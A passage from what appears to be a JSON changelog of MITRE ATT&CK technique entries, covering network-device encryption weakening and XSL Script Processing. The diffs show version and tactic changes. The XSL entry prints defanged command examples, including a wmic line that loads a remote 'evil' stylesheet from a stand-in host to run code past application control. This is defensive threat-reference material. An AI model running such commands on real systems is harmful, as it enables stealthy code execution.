                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.046000+00:00\", \"old_value\": \"2025-10-24 17:48:30.124000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may compromise a network device\\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications.(Citation: Cisco Synful Knock Evolution)\\n\\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\\n\\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts.(Citation: Cisco Blog Legacy Device Attacks)\", \"old_value\": \"Adversaries may compromise a network device\\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\\n\\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\\n\\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-Adversaries may compromise a network device\\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\\n+Adversaries may compromise a network device\\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications.(Citation: Cisco Synful Knock Evolution)\\n \\n Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\\n \\n-Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)\\n+Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts.(Citation: Cisco Blog Legacy Device Attacks)\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to37__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to37__0\"><a href=\"#difflib_chg_to37__top\">t</a></td><td class=\"diff_header\" id=\"from37_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;compromise&nbsp;a&nbsp;network&nbsp;device\u2019s&nbsp;encryption&nbsp;cap</td><td class=\"diff_next\"><a href=\"#difflib_chg_to37__top\">t</a></td><td class=\"diff_header\" id=\"to37_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;compromise&nbsp;a&nbsp;network&nbsp;device\u2019s&nbsp;encryption&nbsp;cap</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ability&nbsp;in&nbsp;order&nbsp;to&nbsp;bypass&nbsp;encryption&nbsp;that&nbsp;would&nbsp;otherwise&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ability&nbsp;in&nbsp;order&nbsp;to&nbsp;bypass&nbsp;encryption&nbsp;that&nbsp;would&nbsp;otherwise&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rotect&nbsp;data&nbsp;communications.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Cisco&nbsp;Synful&nbsp;Knock&nbsp;Ev</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rotect&nbsp;data&nbsp;communications.(Citation:&nbsp;Cisco&nbsp;Synful&nbsp;Knock&nbsp;Evo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">olution)&nbsp;&nbsp;Encryption&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;protect&nbsp;transmitted&nbsp;netw</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lution)&nbsp;&nbsp;Encryption&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;protect&nbsp;transmitted&nbsp;netwo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ork&nbsp;traffic&nbsp;to&nbsp;maintain&nbsp;its&nbsp;confidentiality&nbsp;(protect&nbsp;against</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rk&nbsp;traffic&nbsp;to&nbsp;maintain&nbsp;its&nbsp;confidentiality&nbsp;(protect&nbsp;against&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;unauthorized&nbsp;disclosure)&nbsp;and&nbsp;integrity&nbsp;(protect&nbsp;against&nbsp;una</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">unauthorized&nbsp;disclosure)&nbsp;and&nbsp;integrity&nbsp;(protect&nbsp;against&nbsp;unau</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uthorized&nbsp;changes).&nbsp;Encryption&nbsp;ciphers&nbsp;are&nbsp;used&nbsp;to&nbsp;convert&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">thorized&nbsp;changes).&nbsp;Encryption&nbsp;ciphers&nbsp;are&nbsp;used&nbsp;to&nbsp;convert&nbsp;a&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;plaintext&nbsp;message&nbsp;to&nbsp;ciphertext&nbsp;and&nbsp;can&nbsp;be&nbsp;computationally&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">plaintext&nbsp;message&nbsp;to&nbsp;ciphertext&nbsp;and&nbsp;can&nbsp;be&nbsp;computationally&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">intensive&nbsp;to&nbsp;decipher&nbsp;without&nbsp;the&nbsp;associated&nbsp;decryption&nbsp;key.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ntensive&nbsp;to&nbsp;decipher&nbsp;without&nbsp;the&nbsp;associated&nbsp;decryption&nbsp;key.&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Typically,&nbsp;longer&nbsp;keys&nbsp;increase&nbsp;the&nbsp;cost&nbsp;of&nbsp;cryptanalysis,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Typically,&nbsp;longer&nbsp;keys&nbsp;increase&nbsp;the&nbsp;cost&nbsp;of&nbsp;cryptanalysis,&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;decryption&nbsp;without&nbsp;the&nbsp;key.&nbsp;&nbsp;Adversaries&nbsp;can&nbsp;compromise&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;decryption&nbsp;without&nbsp;the&nbsp;key.&nbsp;&nbsp;Adversaries&nbsp;can&nbsp;compromise&nbsp;an</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd&nbsp;manipulate&nbsp;devices&nbsp;that&nbsp;perform&nbsp;encryption&nbsp;of&nbsp;network&nbsp;tra</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;manipulate&nbsp;devices&nbsp;that&nbsp;perform&nbsp;encryption&nbsp;of&nbsp;network&nbsp;traf</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ffic.&nbsp;For&nbsp;example,&nbsp;through&nbsp;behaviors&nbsp;such&nbsp;as&nbsp;[Modify&nbsp;System&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fic.&nbsp;For&nbsp;example,&nbsp;through&nbsp;behaviors&nbsp;such&nbsp;as&nbsp;[Modify&nbsp;System&nbsp;I</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Image](https://attack.mitre.org/techniques/T1601),&nbsp;[Reduce&nbsp;K</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mage](https://attack.mitre.org/techniques/T1601),&nbsp;[Reduce&nbsp;Ke</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ey&nbsp;Space](https://attack.mitre.org/techniques/T1600/001),&nbsp;an</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;Space](https://attack.mitre.org/techniques/T1600/001),&nbsp;and</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;[Disable&nbsp;Crypto&nbsp;Hardware](https://attack.mitre.org/techniq</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;[Disable&nbsp;Crypto&nbsp;Hardware](https://attack.mitre.org/techniqu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ues/T1600/002),&nbsp;an&nbsp;adversary&nbsp;can&nbsp;negatively&nbsp;effect&nbsp;and/or&nbsp;el</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es/T1600/002),&nbsp;an&nbsp;adversary&nbsp;can&nbsp;negatively&nbsp;effect&nbsp;and/or&nbsp;eli</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iminate&nbsp;a&nbsp;device\u2019s&nbsp;ability&nbsp;to&nbsp;securely&nbsp;encrypt&nbsp;network&nbsp;traff</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">minate&nbsp;a&nbsp;device\u2019s&nbsp;ability&nbsp;to&nbsp;securely&nbsp;encrypt&nbsp;network&nbsp;traffi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ic.&nbsp;This&nbsp;poses&nbsp;a&nbsp;greater&nbsp;risk&nbsp;of&nbsp;unauthorized&nbsp;disclosure&nbsp;and</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">c.&nbsp;This&nbsp;poses&nbsp;a&nbsp;greater&nbsp;risk&nbsp;of&nbsp;unauthorized&nbsp;disclosure&nbsp;and&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;help&nbsp;facilitate&nbsp;data&nbsp;manipulation,&nbsp;Credential&nbsp;Access,&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;help&nbsp;facilitate&nbsp;data&nbsp;manipulation,&nbsp;Credential&nbsp;Access,&nbsp;or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;Collection&nbsp;efforts.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Cisco&nbsp;Blog&nbsp;Legacy&nbsp;Device&nbsp;At</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Collection&nbsp;efforts.(Citation:&nbsp;Cisco&nbsp;Blog&nbsp;Legacy&nbsp;Device&nbsp;Atta</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tacks)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cks)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0339: Detection Strategy for Weaken Encryption on Network Devices"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 19:11:18.757000+00:00",
                    "modified": "2026-04-16 20:07:53.028000+00:00",
                    "name": "Disable Crypto Hardware",
                    "description": "Adversaries disable a network device\u2019s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1600/002",
                            "external_id": "T1600.002"
                        },
                        {
                            "source_name": "Cisco Blog Legacy Device Attacks",
                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.028000+00:00\", \"old_value\": \"2025-10-24 17:49:01.374000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0494: Detection Strategy for Weaken Encryption: Disable Crypto Hardware on Network Devices"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 19:03:48.310000+00:00",
                    "modified": "2026-04-16 20:07:53.005000+00:00",
                    "name": "Reduce Key Space",
                    "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1600/001",
                            "external_id": "T1600.001"
                        },
                        {
                            "source_name": "Cisco Synful Knock Evolution",
                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
                        },
                        {
                            "source_name": "Cisco Blog Legacy Device Attacks",
                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.005000+00:00\", \"old_value\": \"2025-10-24 17:48:40.223000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0243: Detection Strategy for Weaken Encryption: Reduce Key Space on Network Devices"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-10-17 00:14:20.652000+00:00",
                    "modified": "2026-04-15 22:53:58.559000+00:00",
                    "name": "XSL Script Processing",
                    "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n* Remote File: <code>wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d</code>",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1220",
                            "external_id": "T1220"
                        },
                        {
                            "source_name": "Reaqta MSXSL Spearphishing MAR 2018",
                            "description": "Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.",
                            "url": "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/"
                        },
                        {
                            "source_name": "LOLBAS Wmic",
                            "description": "LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Wmic/"
                        },
                        {
                            "source_name": "Microsoft msxsl.exe",
                            "description": "Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.",
                            "url": "https://web.archive.org/web/20190508171106/https://www.microsoft.com/en-us/download/details.aspx?id=21714"
                        },
                        {
                            "source_name": "Penetration Testing Lab MSXSL July 2017",
                            "description": "netbiosX. (2017, July 6). AppLocker Bypass \u2013 MSXSL. Retrieved July 3, 2018.",
                            "url": "https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/"
                        },
                        {
                            "source_name": "XSL Bypass Mar 2019",
                            "description": "Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE \u2014 A Way to Proxy Code Execution. Retrieved August 2, 2019.",
                            "url": "https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75"
                        },
                        {
                            "source_name": "Microsoft XSLT Script Mar 2017",
                            "description": "Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using <msxsl:script>. Retrieved July 3, 2018.",
                            "url": "https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Avneet Singh",
                        "Casey Smith",
                        "Praetorian"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:53:58.559000+00:00\", \"old_value\": \"2025-10-24 17:49:33.993000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://web.archive.org/web/20190508171106/https://www.microsoft.com/en-us/download/details.aspx?id=21714\", \"old_value\": \"https://www.microsoft.com/download/details.aspx?id=21714\", \"new_path\": \"root['external_references'][3]['url']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"Twitter SquiblyTwo Detection APR 2018\", \"description\": \"Desimone, J. (2018, April 18). Status Update. Retrieved September 12, 2024.\", \"url\": \"https://x.com/dez_/status/986614411711442944\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0205: Detect XSL Script Abuse via msxsl and wmic"
                        ],
                        "new": [],
                        "dropped": []
                    }
                }
            ],
            "minor_version_changes": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:49.546000+00:00",
                    "modified": "2026-01-27 20:03:38.098000+00:00",
                    "name": "Command and Scripting Interpreter",
                    "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1059",
                            "external_id": "T1059"
